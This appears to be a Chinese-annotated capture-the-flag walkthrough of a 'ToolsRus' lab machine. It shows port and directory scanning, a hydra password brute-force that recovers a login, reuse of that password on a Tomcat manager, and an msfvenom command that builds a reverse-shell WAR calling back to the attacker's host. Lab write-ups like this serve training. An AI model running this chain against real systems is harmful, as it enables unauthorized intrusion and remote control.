ToolsRus
端口扫描
root@ip-10-10-29-123:~# nmap -sT -p- --min-rate 1000 10.10.252.184
Starting Nmap 7.60 ( https://nmap.org ) at 2023-08-17 10:38 BST
Nmap scan report for ip-10-10-252-184.eu-west-1.compute.internal (10.10.252.184)
Host is up (0.00043s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1234/tcp open hotline
8009/tcp open ajp13
MAC Address: 02:2C:A3:D4:02:A1 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds
root@ip-10-10-29-123:~# nmap -sTCV -p 22,80,1234,8009 --min-rate 1000 10.10.252.184
Starting Nmap 7.60 ( https://nmap.org ) at 2023-08-17 10:38 BST
Nmap scan report for ip-10-10-252-184.eu-west-1.compute.internal (10.10.252.184)
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f2:4f:b9:d5:4b:2e:b7:c5:f7:7d:1e:63:5b:3e:1b:6a (RSA)
| 256 f2:55:91:09:e3:47:95:54:a8:55:af:d8:5c:e8:13:49 (ECDSA)
|_ 256 4d:84:15:9f:cc:61:94:79:b3:67:12:91:d2:be:b3:12 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
MAC Address: 02:2C:A3:D4:02:A1 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds
80 - HTTP
root@ip-10-10-29-123:~# gobuster dir -u http://10.10.252.184/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.252.184/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2023/08/17 10:40:28 Starting gobuster
===============================================================
/guidelines (Status: 301)
/protected (Status: 401)
note
- guidelines : 告诉我们一个用户 bob
- protected : 这个页面需要我们登陆后才可以访问
之后进行暴力破解, 破解对应的密码
root@ip-10-10-29-123:~# hydra -l bob -P `locate rockyou.txt` -s 80 -f 10.10.252.184 http-get /protected
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2023-08-17 11:02:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-get://10.10.252.184:80//protected
[80][http-get] host: 10.10.252.184 login: bob password: bubbles
[STATUS] attack finished for 10.10.252.184 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
登陆之后页面显示, This protected page has now moved to a different port.
根据之前的端口信息我们知道 1234 是一个 Tomcat Server 那么有可能这个密码就是那个的密码
1234 - Tomcat
使用 80 处暴力破解的密码尝试登陆 Tomcta 管理页面发现可以登陆, 使用 MSF 制作 war 的后门上传
root@ip-10-10-29-123:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.29.123 LPORT=4444 -f war > shell.war
Payload size: 1093 bytes
Final size of war file: 1093 bytes
后渗透
root
上传成功后在本地开启监听后访问即可
